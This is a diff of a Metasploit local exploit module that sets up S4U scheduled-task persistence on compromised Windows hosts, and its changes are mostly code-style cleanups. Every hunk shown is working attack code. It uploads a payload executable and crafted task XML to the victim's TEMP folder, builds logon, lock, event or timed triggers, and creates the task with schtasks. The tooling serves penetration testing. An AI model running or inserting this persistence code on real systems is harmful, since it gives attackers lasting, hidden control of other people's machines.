@@ -44,6 +44,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_sys_config_getuid
             ]
           }
+        },
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
         }
       )
     )
@@ -69,15 +74,14 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if not (sysinfo['OS'] =~ /Windows (Vista|7|8|2008|2012|2016|2019|2022|10)/ )
-      fail_with(Failure::NoTarget, "This module only works on Vista/2008 and above")
+    version = get_version_info
+    unless version.build_number >= Msf::WindowsVersion::Vista_SP0
+      fail_with(Failure::NoTarget, 'This module only works on Vista/2008 and above')
     end
 
-    if datastore['TRIGGER'] == "event"
-      if datastore['EVENT_LOG'].nil? or datastore['EVENT_ID'].nil?
-        print_status("The properties of any event in the event viewer will contain this information")
-        fail_with(Failure::BadConfig, "Advanced options EVENT_LOG and EVENT_ID required for event")
-      end
+    if datastore['TRIGGER'] == 'event' && (datastore['EVENT_LOG'].nil? || datastore['EVENT_ID'].nil?)
+      print_status('The properties of any event in the event viewer will contain this information')
+      fail_with(Failure::BadConfig, 'Advanced options EVENT_LOG and EVENT_ID required for event')
     end
 
     # Generate payload
@@ -102,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Local
     write_xml(xml, xml_path, rexe_path)
 
     # Name task with Opt or give random name
-    schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
+    schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha(rand(6..13))
 
     # Create task with modified XML
     create_task(xml_path, schname, rexe_path)
@@ -112,8 +116,8 @@ class MetasploitModule < Msf::Exploit::Local
   # Generate name for payload
   # Returns name
   def generate_rexename
-    rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + ".exe"
-    if not rexename =~ /\.exe$/
+    rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha(rand(6..13)) + '.exe'
+    if rexename !~ /\.exe$/
       print_warning("#{datastore['REXENAME']} isn't an exe")
     end
     return rexename
@@ -125,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Local
   def generate_path(rexename)
     # Generate a path to write payload and XML
     path = datastore['PATH'] || session.sys.config.getenv('TEMP')
-    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}.xml"
+    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.xml"
     rexe_path = "#{path}\\#{rexename}"
     return xml_path, rexe_path
   end
@@ -142,7 +146,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       write_file(path, payload)
-    rescue => e
+    rescue StandardError
       fail_with(Failure::Unknown, "Could not upload to #{path}")
     end
 
@@ -153,22 +157,22 @@ class MetasploitModule < Msf::Exploit::Local
   # Creates a scheduled task, exports as XML, deletes task
   # Returns normal XML for generic task
   def create_xml(rexe_path)
-    xml_path = File.join(Msf::Config.data_directory, "exploits", "s4u_persistence.xml")
-    xml_file = File.new(xml_path, "r")
+    xml_path = File.join(Msf::Config.data_directory, 'exploits', 's4u_persistence.xml')
+    xml_file = File.new(xml_path, 'r')
     xml = xml_file.read
     xml_file.close
 
     # Get local time, not system time from victim machine
     begin
       vt = client.railgun.kernel32.GetLocalTime(32)
-      ut = vt['lpSystemTime'].unpack("v*")
+      ut = vt['lpSystemTime'].unpack('v*')
       t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
-    rescue
-      print_warning("Could not read system time from victim... Using your local time to determine creation date")
+    rescue StandardError
+      print_warning('Could not read system time from victim... Using your local time to determine creation date')
       t = ::Time.now
     end
-    date = t.strftime("%Y-%m-%d")
-    time = t.strftime("%H:%M:%S")
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
 
     # Put in correct times
     xml = xml.gsub(/DATEHERE/, "#{date}T#{time}")
@@ -192,19 +196,19 @@ class MetasploitModule < Msf::Exploit::Local
     case datastore['TRIGGER']
     when 'logon'
       # Trigger based on winlogon event, checks windows license key after logon
-      print_status("This trigger triggers on event 4101 which validates the Windows license")
+      print_status('This trigger triggers on event 4101 which validates the Windows license')
       line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
-      xml = create_trigger_event_tags("Application", line, xml)
+      xml = create_trigger_event_tags('Application', line, xml)
 
     when 'lock'
-      xml = create_trigger_tags("SessionLock", xml)
+      xml = create_trigger_tags('SessionLock', xml)
 
     when 'unlock'
-      xml = create_trigger_tags("SessionUnlock", xml)
+      xml = create_trigger_tags('SessionUnlock', xml)
 
     when 'event'
       line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
-      if not datastore['XPATH'].nil? and not datastore['XPATH'].empty?
+      if !datastore['XPATH'].nil? && !datastore['XPATH'].empty?
         # Append xpath queries
         line << " and #{datastore['XPATH']}"
         # Print XPath query, useful to user to spot issues with uncommented single quotes
@@ -215,10 +219,10 @@ class MetasploitModule < Msf::Exploit::Local
 
     when 'schedule'
       # Change interval tag, insert into XML
-      if datastore['FREQUENCY'] != 0
+      unless datastore['FREQUENCY'].nil? || datastore['FREQUENCY'] == 0
         minutes = datastore['FREQUENCY']
       else
-        print_status("Defaulting frequency to every hour")
+        print_status('Defaulting frequency to every hour')
         minutes = 60
       end
       xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
@@ -228,7 +232,7 @@ class MetasploitModule < Msf::Exploit::Local
         # Generate expire tag
         end_boundary = create_expire_tag
         # Inject expire tag
-        insert = xml.index("</StartBoundary>")
+        insert = xml.index('</StartBoundary>')
         xml.insert(insert + 16, "\n      #{end_boundary}")
       end
     end
@@ -238,21 +242,21 @@ class MetasploitModule < Msf::Exploit::Local
   ##############################################################
   # Creates end boundary tag which expires the trigger
   # Returns XML for expire
-  def create_expire_tag()
+  def create_expire_tag
     # Get local time, not system time from victim machine
     begin
       vt = client.railgun.kernel32.GetLocalTime(32)
-      ut = vt['lpSystemTime'].unpack("v*")
+      ut = vt['lpSystemTime'].unpack('v*')
       t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
-    rescue
-      print_error("Could not read system time from victim... Using your local time to determine expire date")
+    rescue StandardError
+      print_error('Could not read system time from victim... Using your local time to determine expire date')
       t = ::Time.now
     end
 
     # Create time object to add expire time to and create tag
-    t = t + (datastore['EXPIRE_TIME'] * 60)
-    date = t.strftime("%Y-%m-%d")
-    time = t.strftime("%H:%M:%S")
+    t += (datastore['EXPIRE_TIME'] * 60)
+    date = t.strftime('%Y-%m-%d')
+    time = t.strftime('%H:%M:%S')
     end_boundary = "<EndBoundary>#{date}T#{time}</EndBoundary>"
     return end_boundary
   end
@@ -271,9 +275,9 @@ class MetasploitModule < Msf::Exploit::Local
     temp_xml << "      <Enabled>true</Enabled>\n"
     temp_xml << "      <StateChange>#{trig}</StateChange>\n"
     temp_xml << "      <UserId>#{domain}\\#{user}</UserId>\n"
-    temp_xml << "    </SessionStateChangeTrigger>"
+    temp_xml << '    </SessionStateChangeTrigger>'
 
-    xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)
+    xml = xml.gsub(%r{<TimeTrigger>.*</TimeTrigger>}m, temp_xml)
 
     return xml
   end
@@ -288,14 +292,14 @@ class MetasploitModule < Msf::Exploit::Local
     temp_xml = "<EventTrigger>\n"
     temp_xml << "      #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0
     temp_xml << "      <Enabled>true</Enabled>\n"
-    temp_xml << "      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" "
+    temp_xml << '      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" '
     temp_xml << "Path=\"#{log}\"&gt;&lt;Select Path=\"#{log}\"&gt;"
     temp_xml << line
-    temp_xml << "&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;"
+    temp_xml << '&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;'
     temp_xml << "</Subscription>\n"
-    temp_xml << "    </EventTrigger>"
+    temp_xml << '    </EventTrigger>'
 
-    xml = xml.gsub(/<TimeTrigger>.*<\/TimeTrigger>/m, temp_xml)
+    xml = xml.gsub(%r{<TimeTrigger>.*</TimeTrigger>}m, temp_xml)
     return xml
   end
 
@@ -309,7 +313,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     begin
       write_file(path, xml)
-    rescue
+    rescue StandardError
       delete_file(rexe_path)
       fail_with(Failure::Unknown, "Issues writing XML to #{path}")
     end
@@ -320,11 +324,9 @@ class MetasploitModule < Msf::Exploit::Local
   # Takes path and delete file
   # Returns boolean for success
   def delete_file(path)
-    begin
-      file_rm(path)
-    rescue
-      print_warning("Could not delete file #{path}, delete manually")
-    end
+    file_rm(path)
+  rescue StandardError
+    print_warning("Could not delete file #{path}, delete manually")
   end
 
   ##############################################################
@@ -332,43 +334,43 @@ class MetasploitModule < Msf::Exploit::Local
   # Returns boolean for success
   def create_task(path, schname, rexe_path)
     # create task using XML file on victim fs
-    create_task_response = cmd_exec("cmd.exe", "/c schtasks /create /xml #{path} /tn \"#{schname}\"")
+    create_task_response = cmd_exec('cmd.exe', "/c schtasks /create /xml #{path} /tn \"#{schname}\"")
     if create_task_response =~ /has successfully been created/
       print_good("Persistence task #{schname} created successfully")
 
       # Create to delete commands for exe and task
       del_task = "schtasks /delete /tn \"#{schname}\" /f"
-      print_status("#{"To delete task:".ljust(20)} #{del_task}")
-      print_status("#{"To delete payload:".ljust(20)} del #{rexe_path}")
+      print_status("#{'To delete task:'.ljust(20)} #{del_task}")
+      print_status("#{'To delete payload:'.ljust(20)} del #{rexe_path}")
       del_task << "\ndel #{rexe_path}"
 
       # Delete XML from victim
       delete_file(path)
 
       # Save info to notes DB
-      report_note(:host => session.session_host,
-                  :type => "host.s4u_persistance.cleanup",
-                  :data => {
-                    :session_num => session.sid,
-                    :stype => session.type,
-                    :desc => session.info,
-                    :platform => session.platform,
-                    :via_payload => session.via_payload,
-                    :via_exploit => session.via_exploit,
-                    :created_at => Time.now.utc,
-                    :delete_commands => del_task
+      report_note(host: session.session_host,
+                  type: 'host.s4u_persistance.cleanup',
+                  data: {
+                    session_num: session.sid,
+                    stype: session.type,
+                    desc: session.info,
+                    platform: session.platform,
+                    via_payload: session.via_payload,
+                    via_exploit: session.via_exploit,
+                    created_at: Time.now.utc,
+                    delete_commands: del_task
                   })
     elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
       # Clean up
       delete_file(rexe_path)
       delete_file(path)
-      error = "The scheduled task name is already in use"
+      error = 'The scheduled task name is already in use'
       fail_with(Failure::Unknown, error)
     else
-      error = "Issues creating task using XML file schtasks"
+      error = 'Issues creating task using XML file schtasks'
       vprint_error("Error: #{create_task_response}")
-      if datastore['EVENT_LOG'] == 'Security' and datastore['TRIGGER'] == "Event"
-        print_warning("Security log can restricted by UAC, try a different trigger")
+      if (datastore['EVENT_LOG'] == 'Security') && (datastore['TRIGGER'] == 'Event')
+        print_warning('Security log can restricted by UAC, try a different trigger')
       end
       # Clean up
       delete_file(rexe_path)
